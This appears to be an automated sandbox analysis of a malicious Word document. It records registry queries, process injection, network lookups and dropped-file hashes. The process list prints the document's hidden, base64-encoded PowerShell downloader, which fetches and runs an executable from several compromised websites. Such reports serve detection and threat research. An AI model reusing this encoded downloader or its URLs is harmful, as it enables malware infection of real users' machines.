| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2680 wrote to memory of 628 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe |
| PID 2680 wrote to memory of 628 | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | C:\Windows\splwow64.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1ce640215c5dfbfe305436b07a2a63072fc67e9e1dc18377d03240397cc8d2d4.doc" /o ""
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABPAGYAaAByAGYAYgBwAHgAcQA9ACcASABnAGEAZgBnAGoAagB6ACcAOwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACAAPQAgACcAOQA3ADMAJwA7ACQARgBwAGkAbQByAHgAYQBxAGUAPQAnAFEAYwB2AHcAbgBnAGoAZAByAGsAdwBsACcAOwAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAE8AYQB4AGwAdQBsAHYAeABsAHcAZABsACsAJwAuAGUAeABlACcAOwAkAFUAcgBmAG0AdABtAGoAdgBqAD0AJwBKAHMAawBzAHcAegB3AHAAbQBxAHkAawAnADsAJABIAGUAbwBtAGUAdwBsAHoAdgA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAFQALgBXAGUAQgBDAGwAaQBlAE4AVAA7ACQAVQBoAGkAdABkAG8AagBrAGMAPQAnAGgAdAB0AHAAOgAvAC8AagBvAGEAbwBsAGUAbwBiAGEAcgBiAGkAZQByAGkALgBhAGQAdgAuAGIAcgAvAHQAZQBzAHQALwBsADQAZAA2ADYAMwA4AHYANgBsAC0AZgBvAHQAbgB1ADUAbQAtADgANgA3ADAAMgA3ADIANwA4AC8AKgBoAHQAdABwADoALwAvAGsAYQBwAGwAYQBuAGYAbwByAGsAbABpAGYAdAAuAGMAbwBtAC8AdwBlAGIAXwBtAGEAcAAvAFAAbQBUAHUASQBFAFEALwAqAGgAdAB0AHAAOgAvAC8AbABvAG4AZABvAG4AdAByAGEAdgBlAGwALgBjAG8AbQAuAGEAcgAvAGIAcgBjAC8ASABzAEcAcAB1AFAAUgAvACoAaAB0AHQAcABzADoALwAvAGwAZQBhAHYAZQBuAHcAbwByAHQAaAByAGUAbgB0AGEAbAAuAGMAbwBtAC8AYwBhAGwAZQBuAGQAYQByAC8AYQBvAG8ALQB1AGUANwAtADYANQAzADcANAAwAC8AKgBoAHQAdABwADoALwAvAGwAYQByAGUAcwBlAHIAdgBhAC4AYwBvAG0ALgBwAHkALwBhAGwAbwBqAGEALwBBAE8ASQBTAHIAbwBKAG0AcQAvACcALgAiAFMAcABsAGAAaQB0ACIAKAAnACoAJwApADsAJABEAHEAdwB0AHUAaQBlAHYAaAB4AGYAdgBkAD0AJwBMAHUAcwB1AGUAZQBuAHkAawB1AGsAYQB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACAAaQBuACAAJABVAGgAaQB0AGQAbwBqAGsAYwApAHsAdAByAHkAewAkAEgAZQBvAG0AZQB3AGwAegB2AC4AIgBkAGAAbwBXAG4AbABvAGAAQQBgAEQARgBpAGwAZQAiACgAJABLAGMAcgBoAGsAcAB2AGsAcgB5AGYAYwBhACwAIAAkAE0AdQBtAG0AaQB3AGQAdwByAGIAZQBmAGwAKQA7ACQAVwBoAHcAcQBxAHYAbgBjAG8AcwBvAD0AJwBOAG0AYgB3AGwAcQBiAHYAZgBwACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATQB1AG0AbQBpAHcAZAB3AHIAYgBlAGYAbAApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANAAyADUAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAQQBgAFIAVAAiACgAJABNAHUAbQBtAGkAdwBkAHcAcgBiAGUAZgBsACkAOwAkAFIAbAB5AGoAaQBpAHYAcgBhAHgAegA9ACcAQwB5AHIAZABjAHEAcgBjAGwAeAB0AG8AJwA7AGIAcgBlAGEAawA7ACQAWQB0AHEAcwBxAHoAYQBlAGIAPQAnAEoAZgBzAHQAbQBvAGMAaQByACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEQAYgBtAHAAYQBuAGYAbgA9ACcAVABkAHcAeQBrAGYAaQBvAHQAeAB3AG4AJwA=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 18.89.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | joaoleobarbieri.adv.br | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | kaplanforklift.com | udp |
| TR | 78.135.106.243:80 | kaplanforklift.com | tcp |
| US | 8.8.8.8:53 | londontravel.com.ar | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.106.135.78.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leavenworthrental.com | udp |
| US | 192.249.119.99:443 | leavenworthrental.com | tcp |
| US | 8.8.8.8:53 | lareserva.com.py | udp |
| PY | 186.16.13.18:80 | lareserva.com.py | tcp |
| US | 8.8.8.8:53 | 99.119.249.192.in-addr.arpa | udp |
| PY | 186.16.13.18:443 | lareserva.com.py | tcp |
| US | 8.8.8.8:53 | 18.13.16.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | metadata.templates.cdn.office.net | udp |
| GB | 2.22.249.39:443 | metadata.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | binaries.templates.cdn.office.net | udp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| GB | 2.19.117.150:443 | binaries.templates.cdn.office.net | tcp |
| US | 8.8.8.8:53 | 39.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
memory/2680-1-0x00007FFD35050000-0x00007FFD35060000-memory.dmp
memory/2680-0-0x00007FFD7506D000-0x00007FFD7506E000-memory.dmp
memory/2680-3-0x00007FFD35050000-0x00007FFD35060000-memory.dmp
memory/2680-2-0x00007FFD35050000-0x00007FFD35060000-memory.dmp
memory/2680-6-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-5-0x00007FFD35050000-0x00007FFD35060000-memory.dmp
memory/2680-10-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-11-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-9-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-12-0x00007FFD32F60000-0x00007FFD32F70000-memory.dmp
memory/2680-8-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-7-0x00007FFD35050000-0x00007FFD35060000-memory.dmp
memory/2680-4-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-13-0x00007FFD32F60000-0x00007FFD32F70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\9FAD0D59.wmf
| MD5 | a3263b17d74f27b01e3c2676b3c36fa7 |
| SHA1 | d4cc5303ffd17e3914e9094bec5838a767ea954d |
| SHA256 | 5674d885c514f9b64658b6cb0916eeeb6a4a8217577da15293682dd115549098 |
| SHA512 | 29bc289982645fe00b3b45bff31da3e39be502982774a08d1479f2902cd4dbf3cfffec9479c4d0a756c1ad45c906be0d3d72c09f6857a0b49616e45a90722080 |
memory/4004-46-0x0000017789070000-0x0000017789092000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bcep0ozr.ttg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2680-64-0x00007FFD7506D000-0x00007FFD7506E000-memory.dmp
memory/2680-65-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-66-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-67-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
memory/2680-68-0x00007FFD74FD0000-0x00007FFD751C5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | b706f181c669100862cdb2b836e80b76 |
| SHA1 | c60aeaaa2b1ae680234f77da9ea3e61c79f88783 |
| SHA256 | 23082c38ce0bfb077a614ba2b41ec36637ee8a80a8703f72180becaba3d53e66 |
| SHA512 | 716bd92a730c867a2e3a5de0b8c468cb9fb5ecb76732e8d9450673c7cc7e4b41df89cbe68bf5c0f48d36c12a54a10b8de47482a627d500458c0e6e3215d21698 |
C:\Users\Admin\AppData\Local\Temp\TCD1429.tmp\gb.xsl
| MD5 | 51d32ee5bc7ab811041f799652d26e04 |
| SHA1 | 412193006aa3ef19e0a57e16acf86b830993024a |
| SHA256 | 6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97 |
| SHA512 | 5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810 |